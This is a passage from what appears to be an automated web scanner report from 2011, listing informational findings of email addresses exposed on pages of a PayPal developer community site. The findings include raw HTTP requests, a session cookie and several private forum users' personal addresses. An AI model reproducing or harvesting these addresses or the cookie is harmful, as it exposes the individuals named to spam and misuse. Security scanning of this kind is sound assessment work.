&lt;/span&gt;&amp;#160; objBodyPart.Charset = "UTF-8"&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&amp;#160; objEmail.From = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com"&gt;contact@XXXXXXX.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&amp;#160; objEmail.To = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com"&gt;contact@YYYYYYY.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; objEmail.Subject = "IPN - Test One"&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; objEmail.Textbody
...[SNIP]...
bjBodyPart.Charset = "UTF-8"&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; &lt;span&gt; &lt;/span&gt;&lt;span&gt;objEmail.From = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com"&gt;contact@XXXXXXX.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; &lt;span&gt; &lt;/span&gt;&lt;span&gt;objEmail.To = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com"&gt;contact@YYYYYYY.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;objEmail.Subject = "IPN - Test Two "&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;objEmail.Textbody = "Verified"&lt;/p&gt
...[SNIP]...
<author>rubbyraj22@yahoo.com</author>
...[SNIP]...

8.4. https://www.x.com/community/feeds/popularthreads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/popularthreads

Issue detail

The following email address was disclosed in the response:

Request

GET /community/feeds/popularthreads HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:10 GMT
Server: Apache-Coyote/1.1
Last-Modified: Fri, 12 Aug 2011 13:48:31 GMT
Etag: "1313156911867"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=116756 t=1313157010798881
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
;/p&gt;&lt;p&gt;My sandbox business account email is&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:bzdmit_1243814267_biz@gmail.com"&gt;bzdmit_1243814267_biz@gmail.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Thank you very much in advance and best regards,&lt;/p&gt;&lt;p&gt;Dmitry&lt;/p&gt;&lt;/div
...[SNIP]...

8.5. https://www.x.com/community/feeds/unansweredthreads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/unansweredthreads

Issue detail

The following email address was disclosed in the response:

Request

GET /community/feeds/unansweredthreads?community=2114 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 02 Jun 2011 12:51:07 GMT
Etag: "1307019067561"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=8661 t=1313157027820792
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
p direct payment on my account. thanks&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;a class="jive-link-email-small" href="mailto:seller_1282344506_biz@gmail.com"&gt;seller_1282344506_biz@gmail.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;!-- [DocumentBodyEnd:fe1ef89b-0a60-4b13-88f9-86317b895cde] --&gt;</description>
...[SNIP]...

8.6. https://www.x.com/community/ppx/businesspayments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:dl-pp-businesspayments@paypal.com"><em>dl-pp-businesspayments@paypal.com</em>
...[SNIP]...
<a href="mailto:dl-pp-businesspayments@paypal.com">
...[SNIP]...

8.7. https://www.x.com/community/ppx/devchallenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:contest@paypal.com">contest@paypal.com</a>
...[SNIP]...

8.8. https://www.x.com/community/ppx/devchallenge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:contest@paypal.com">contest@paypal.com</a>
...[SNIP]...

8.9. https://www.x.com/community/ppx/devtalk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:paypalstory@accesspr.com">
...[SNIP]...

8.10. https://www.x.com/community/ppx/devzone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:travis@travisrobertson.com">travis@travisrobertson.com</a>
...[SNIP]...

8.11. https://www.x.com/community/ppx/global/uk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:ukdevelopers@paypal.com">
...[SNIP]...

8.12. https://www.x.com/docs/DOC-1106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:&amp;L_BUTTONVAR0=business=merchant@abc.com">&amp;L_BUTTONVAR0=business=merchant@abc.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:business=XX-usbiz@paypal.com">business=XX-usbiz@paypal.com</a>
...[SNIP]...

8.13. https://www.x.com/docs/DOC-1106.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106.pdf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-1106.pdf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Pragma: expires
Cache-Control: no-cache, private
Content-disposition: attachment
Content-Type: application/pdf;charset=UTF-8
Content-Language: en-US
JP: D=725131 t=1313157250843835
Vary: User-Agent
Connection: close

%PDF-1.4
%....
4 0 obj
<<
/Producer (Apache FOP Version 0.95beta)
/CreationDate (D:20110812065411-07'00')
>>
endobj
5 0 obj
<<
/N 3
/Length 14 0 R
/Filter /FlateDecode
>>
stream
x...wTS.....7.P.
...[SNIP]...
< /URI (mailto:&L_BUTTONVAR0=business=merchant@abc.com)
/S /URI >
...[SNIP]...
< /URI (mailto:business=XX-usbiz@paypal.com)
/S /URI >
...[SNIP]...

8.14. https://www.x.com/docs/DOC-1431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The following email address was disclosed in the response:

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:paypal@your-domain.com">paypal@your-domain.com</a>
...[SNIP]...

8.15. https://www.x.com/docs/DOC-1551  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The following email address was disclosed in the response:

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:dlajoie66@aol.com">dlajoie66@aol.com</a>
...[SNIP]...

8.16. https://www.x.com/docs/DOC-1613  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:paypro_1301916441_biz@bambeeq.com">paypro_1301916441_biz@bambeeq.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:xxxxx_1305510764_per@gmail.com">xxxxx_1305510764_per@gmail.com</a>
...[SNIP]...

8.17. https://www.x.com/docs/DOC-2241  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:payflowbeta@paypal.com">payflowbeta@paypal.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com">=Joe.Smith@anyemail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com">Joe.Smith@anyemail.com</a>
...[SNIP]...

8.18. https://www.x.com/message/198017  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The following email address was disclosed in the response:

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34393435343b312c35333937373b312c35343036353b312c35343035383b312c35333838343b312c34373636333b312c35333135383b312c35333137323b312c35333235323b312c35333331323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:business=book_0123456789_biz@isp.net/">business=book_0123456789_biz@isp.net/</a>
...[SNIP]...

8.19. https://www.x.com/message/212753  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The following email address was disclosed in the response:

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333037353b312c35333437393b312c35333631303b312c35333539323b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b312c35333638373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:email=merch_1309501980_biz@seneca-global.com">email=merch_1309501980_biz@seneca-global.com</a>
...[SNIP]...

8.20. https://www.x.com/message/213865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The following email addresses were disclosed in the response:

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehe_1307099300_biz@gmail.com">codehe_1307099300_biz@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehecode@gmail.com">codehecode@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small active_link" href="mailto:codehe_1307339868_biz@gmail.com">
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehe_1307339868_biz@gmail.com">
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehecode@gmail.com">codehecode@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehe_1307339868_biz@gmail.com">codehe_1307339868_biz@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small active_link" href="mailto:filthy_1308141645_per@gmail.com">filthy_1308141645_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:filthy_1308141865_biz@gmail.com">filthy_1308141865_biz@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:seller_1311232257_biz@gmail.com">seller_1311232257_biz@gmail.com</a>
...[SNIP]...

8.21. https://www.x.com/message/214902  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The following email address was disclosed in the response:

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
